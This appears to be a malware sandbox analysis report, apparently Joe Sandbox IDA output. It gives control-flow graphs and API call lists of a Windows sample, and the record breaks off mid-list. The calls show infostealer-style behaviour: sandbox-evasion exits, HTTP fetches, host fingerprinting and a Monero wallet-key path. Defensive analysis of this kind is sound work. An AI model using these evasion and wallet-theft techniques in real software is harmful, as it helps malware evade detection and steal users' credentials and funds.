                              control_flow_graph 1033 326280-32630b call 33a7a0 call 3247b0 call 33a740 InternetOpenA StrCmpCA 1040 326314-326318 1033->1040 1041 32630d 1033->1041 1042 326509-326525 call 33a7a0 call 33a800 * 2 1040->1042 1043 32631e-326342 InternetConnectA 1040->1043 1041->1040 1062 326528-32652d 1042->1062 1045 326348-32634c 1043->1045 1046 3264ff-326503 InternetCloseHandle 1043->1046 1047 32635a 1045->1047 1048 32634e-326358 1045->1048 1046->1042 1050 326364-326392 HttpOpenRequestA 1047->1050 1048->1050 1052 3264f5-3264f9 InternetCloseHandle 1050->1052 1053 326398-32639c 1050->1053 1052->1046 1055 3263c5-326405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 32639e-3263bf InternetSetOptionA 1053->1056 1058 326407-326427 call 33a740 call 33a800 * 2 1055->1058 1059 32642c-32644b call 338940 1055->1059 1056->1055 1058->1062 1066 3264c9-3264e9 call 33a740 call 33a800 * 2 1059->1066 1067 32644d-326454 1059->1067 1066->1062 1069 326456-326480 InternetReadFile 1067->1069 1070 3264c7-3264ef InternetCloseHandle 1067->1070 1073 326482-326489 1069->1073 1074 32648b 1069->1074 1070->1052 1073->1074 1078 32648d-3264c5 call 33a9b0 call 33a8a0 call 33a800 1073->1078 1074->1070 1078->1069
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00340DFE,00000001,00000000,00000000,00000000), ref: 003262E1
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00326303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00326335
                              • HttpOpenRequestA.WININET(00000000,GET,?,0109E398,00000000,00000000,00400100,00000000), ref: 00326385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003263BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003263D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 003263FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0032646D
                              • InternetCloseHandle.WININET(00000000), ref: 003264EF
                              • InternetCloseHandle.WININET(00000000), ref: 003264F9
                              • InternetCloseHandle.WININET(00000000), ref: 00326503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 00a8ac875a730e3da7800999ad69453f33615747e1cf57cb4c83b387a050b69c
                              • Instruction ID: 3018af24a5b6518910f6526ab8acb68ad5d19088933281c84fd326dfc4466d31
                              • Opcode Fuzzy Hash: 00a8ac875a730e3da7800999ad69453f33615747e1cf57cb4c83b387a050b69c
                              • Instruction Fuzzy Hash: 49714F71A00218ABDB15EFA4DC95FEE77B8FF44700F108198F50A6B190DBB46A89DF51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 335510-335577 call 335ad0 call 33a820 * 3 call 33a740 * 4 1106 33557c-335583 1090->1106 1107 3355d7-33564c call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1106->1107 1108 335585-3355b6 call 33a820 call 33a7a0 call 321590 call 3351f0 1106->1108 1134 335693-3356a9 call 33aad0 StrCmpCA 1107->1134 1138 33564e-33568e call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1107->1138 1124 3355bb-3355d2 call 33a8a0 call 33a800 1108->1124 1124->1134 1139 3356af-3356b6 1134->1139 1140 3357dc-335844 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1134->1140 1138->1134 1143 3357da-33585f call 33aad0 StrCmpCA 1139->1143 1144 3356bc-3356c3 1139->1144 1270 335ac3-335ac6 1140->1270 1162 335991-3359f9 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1143->1162 1163 335865-33586c 1143->1163 1147 3356c5-335719 call 33a820 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1144->1147 1148 33571e-335793 call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1144->1148 1147->1143 1148->1143 1249 335795-3357d5 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1148->1249 1162->1270 1170 335872-335879 1163->1170 1171 33598f-335a14 call 33aad0 StrCmpCA 1163->1171 1178 3358d3-335948 call 33a740 * 2 call 321590 call 3352c0 call 33a8a0 call 33a800 call 33aad0 StrCmpCA 1170->1178 1179 33587b-3358ce call 33a820 call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1170->1179 1199 335a16-335a21 Sleep 1171->1199 1200 335a28-335a91 call 33a8a0 call 33a820 * 2 call 321670 call 33a800 * 4 call 336560 call 321550 1171->1200 1178->1171 1275 33594a-33598a call 33a7a0 call 321590 call 3351f0 call 33a8a0 call 33a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                              APIs
                                • Part of subcall function 0033A820: lstrlen.KERNEL32(00324F05,?,?,00324F05,00340DDE), ref: 0033A82B
                                • Part of subcall function 0033A820: lstrcpy.KERNEL32(00340DDE,00000000), ref: 0033A885
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003356A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335857
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335228
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 003352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335318
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 0033532F
                                • Part of subcall function 003352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00335364
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 00335383
                                • Part of subcall function 003352C0: lstrlen.KERNEL32(00000000), ref: 003353AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0033578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00335940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00335A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00335A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: 00d82733ca9f4d54f8266af19b190e8f3618969cb953151e776c6ba56edecc85
                              • Instruction ID: 56683615bd913ca6f5d25927ea4ac119cbf417433328b7df331ab4ecf80498fd
                              • Opcode Fuzzy Hash: 00d82733ca9f4d54f8266af19b190e8f3618969cb953151e776c6ba56edecc85
                              • Instruction Fuzzy Hash: 8BE15072910604AACB16FBA4DDD2AED7778AF64300F508128F4476F091EF746A4DDB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 3317a0-3317cd call 33aad0 StrCmpCA 1304 3317d7-3317f1 call 33aad0 1301->1304 1305 3317cf-3317d1 ExitProcess 1301->1305 1309 3317f4-3317f8 1304->1309 1310 3319c2-3319cd call 33a800 1309->1310 1311 3317fe-331811 1309->1311 1313 331817-33181a 1311->1313 1314 33199e-3319bd 1311->1314 1316 331913-331924 StrCmpCA 1313->1316 1317 331932-331943 StrCmpCA 1313->1317 1318 3318f1-331902 StrCmpCA 1313->1318 1319 331951-331962 StrCmpCA 1313->1319 1320 331970-331981 StrCmpCA 1313->1320 1321 331835-331844 call 33a820 1313->1321 1322 33187f-331890 StrCmpCA 1313->1322 1323 33185d-33186e StrCmpCA 1313->1323 1324 331821-331830 call 33a820 1313->1324 1325 331849-331858 call 33a820 1313->1325 1326 3318cf-3318e0 StrCmpCA 1313->1326 1327 33198f-331999 call 33a820 1313->1327 1328 3318ad-3318be StrCmpCA 1313->1328 1314->1309 1335 331930 1316->1335 1336 331926-331929 1316->1336 1337 331945-331948 1317->1337 1338 33194f 1317->1338 1333 331904-331907 1318->1333 1334 33190e 1318->1334 1339 331964-331967 1319->1339 1340 33196e 1319->1340 1342 331983-331986 1320->1342 1343 33198d 1320->1343 1321->1314 1350 331892-33189c 1322->1350 1351 33189e-3318a1 1322->1351 1348 331870-331873 1323->1348 1349 33187a 1323->1349 1324->1314 1325->1314 1331 3318e2-3318e5 1326->1331 1332 3318ec 1326->1332 1327->1314 1329 3318c0-3318c3 1328->1329 1330 3318ca 1328->1330 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1314 1336->1335 1337->1338 1338->1314 1339->1340 1340->1314 1342->1343 1343->1314 1348->1349 1349->1314 1355 3318a8 1350->1355 1351->1355 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 003317C5
                              • ExitProcess.KERNEL32 ref: 003317D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: a2e2925da86ec27f32ca538baa6bea95b7157b577eaf2664b686cb81715ce38f
                              • Instruction ID: 47ec6ea34a68651cc518ca1f1766e1dc8414d6d1d673d06e92a3e875ab432188
                              • Opcode Fuzzy Hash: a2e2925da86ec27f32ca538baa6bea95b7157b577eaf2664b686cb81715ce38f
                              • Instruction Fuzzy Hash: 8A5169B4B04209EFCB06DFA4D994FBE77B9BF44704F108048E906AB251D7B0E955DBA2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 337500-33754a GetWindowsDirectoryA 1357 337553-3375c7 GetVolumeInformationA call 338d00 * 3 1356->1357 1358 33754c 1356->1358 1365 3375d8-3375df 1357->1365 1358->1357 1366 3375e1-3375fa call 338d00 1365->1366 1367 3375fc-337617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 337619-337626 call 33a740 1367->1369 1370 337628-337658 wsprintfA call 33a740 1367->1370 1377 33767e-33768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00337542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0033760A
                              • wsprintfA.USER32 ref: 00337640
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$4
                              • API String ID: 1544550907-3012984618
                              • Opcode ID: a68315c525dd1763e0cc1f8a13d7f23be75c6dd2b7642a89e9b722ec84082cbd
                              • Instruction ID: 7b29d2504bb9c150329b5408cbb416f01805d1e659a17b6df58cb3aa3856881b
                              • Opcode Fuzzy Hash: a68315c525dd1763e0cc1f8a13d7f23be75c6dd2b7642a89e9b722ec84082cbd
                              • Instruction Fuzzy Hash: 7A4182F1D04258ABDB11DF98DC95BDEBBB8AF18700F100199F5097B280D7786A44CFA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010922F0), ref: 003398A1
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092218), ref: 003398BA
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092248), ref: 003398D2
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010922A8), ref: 003398EA
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092350), ref: 00339903
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01099258), ref: 0033991B
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010858D0), ref: 00339933
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01085930), ref: 0033994C
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092410), ref: 00339964
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010924E8), ref: 0033997C
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092368), ref: 00339995
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,010924A0), ref: 003399AD
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01085970), ref: 003399C5
                                • Part of subcall function 00339860: GetProcAddress.KERNEL32(74DD0000,01092230), ref: 003399DE
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 003211D0: ExitProcess.KERNEL32 ref: 00321211
                                • Part of subcall function 00321160: GetSystemInfo.KERNEL32(?), ref: 0032116A
                                • Part of subcall function 00321160: ExitProcess.KERNEL32 ref: 0032117E
                                • Part of subcall function 00321110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0032112B
                                • Part of subcall function 00321110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00321132
                                • Part of subcall function 00321110: ExitProcess.KERNEL32 ref: 00321143
                                • Part of subcall function 00321220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0032123E
                                • Part of subcall function 00321220: __aulldiv.LIBCMT ref: 00321258
                                • Part of subcall function 00321220: __aulldiv.LIBCMT ref: 00321266
                                • Part of subcall function 00321220: ExitProcess.KERNEL32 ref: 00321294
                                • Part of subcall function 00336770: GetUserDefaultLangID.KERNEL32 ref: 00336774
                                • Part of subcall function 00321190: ExitProcess.KERNEL32 ref: 003211C6
                                • Part of subcall function 00337850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003211B7), ref: 00337880
                                • Part of subcall function 00337850: RtlAllocateHeap.NTDLL(00000000), ref: 00337887
                                • Part of subcall function 00337850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0033789F
                                • Part of subcall function 003378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337910
                                • Part of subcall function 003378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00337917
                                • Part of subcall function 003378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0033792F
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00336AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00336AF9
                              • Sleep.KERNEL32(00001770), ref: 00336B04
                              • CloseHandle.KERNEL32(?,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336B1A
                              • ExitProcess.KERNEL32 ref: 00336B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: c68063f49443bb7510e1dfab1e822c4b4b3e589ce7919b073a7dbd8dfd926550
                              • Instruction ID: 8d5e70b03560fe5e71e7b41355049fe1a7de6ee04c384dfebacbe2dccb7dd0a7
                              • Opcode Fuzzy Hash: c68063f49443bb7510e1dfab1e822c4b4b3e589ce7919b073a7dbd8dfd926550
                              • Instruction Fuzzy Hash: D0312D71904608AADB06FBF0DC97BEE7778AF14340F104518F242BE191DFB46905DAA2

                              Control-flow Graph

                              control_flow_graph 1436 321220-321247 call 3389b0 GlobalMemoryStatusEx 1439 321273-32127a 1436->1439 1440 321249-321271 call 33da00 * 2 1436->1440 1442 321281-321285 1439->1442 1440->1442 1444 321287 1442->1444 1445 32129a-32129d 1442->1445 1447 321292-321294 ExitProcess 1444->1447 1448 321289-321290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0032123E
                              • __aulldiv.LIBCMT ref: 00321258
                              • __aulldiv.LIBCMT ref: 00321266
                              • ExitProcess.KERNEL32 ref: 00321294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: a58ff027a5e623ea46e4e723d6a3083e1557ad9f422d21904cd5854bc8a6da3b
                              • Instruction ID: 1b951a2c2b273b76a39b9c69fe74560b48e97a2504424525e71c66574e783697
                              • Opcode Fuzzy Hash: a58ff027a5e623ea46e4e723d6a3083e1557ad9f422d21904cd5854bc8a6da3b
                              • Instruction Fuzzy Hash: 6A016DB0D44308FAEB11DBE4ED49B9EBB78AB24701F208448F705BA2C0D7B455458B99

                              Control-flow Graph

                              control_flow_graph 1450 336af3 1451 336b0a 1450->1451 1453 336aba-336ad7 call 33aad0 OpenEventA 1451->1453 1454 336b0c-336b22 call 336920 call 335b10 CloseHandle ExitProcess 1451->1454 1460 336af5-336b04 CloseHandle Sleep 1453->1460 1461 336ad9-336af1 call 33aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00336AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00336AF9
                              • Sleep.KERNEL32(00001770), ref: 00336B04
                              • CloseHandle.KERNEL32(?,00000000,?,01099268,?,0034110C,?,00000000,?,00341110,?,00000000,00340AEF), ref: 00336B1A
                              • ExitProcess.KERNEL32 ref: 00336B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
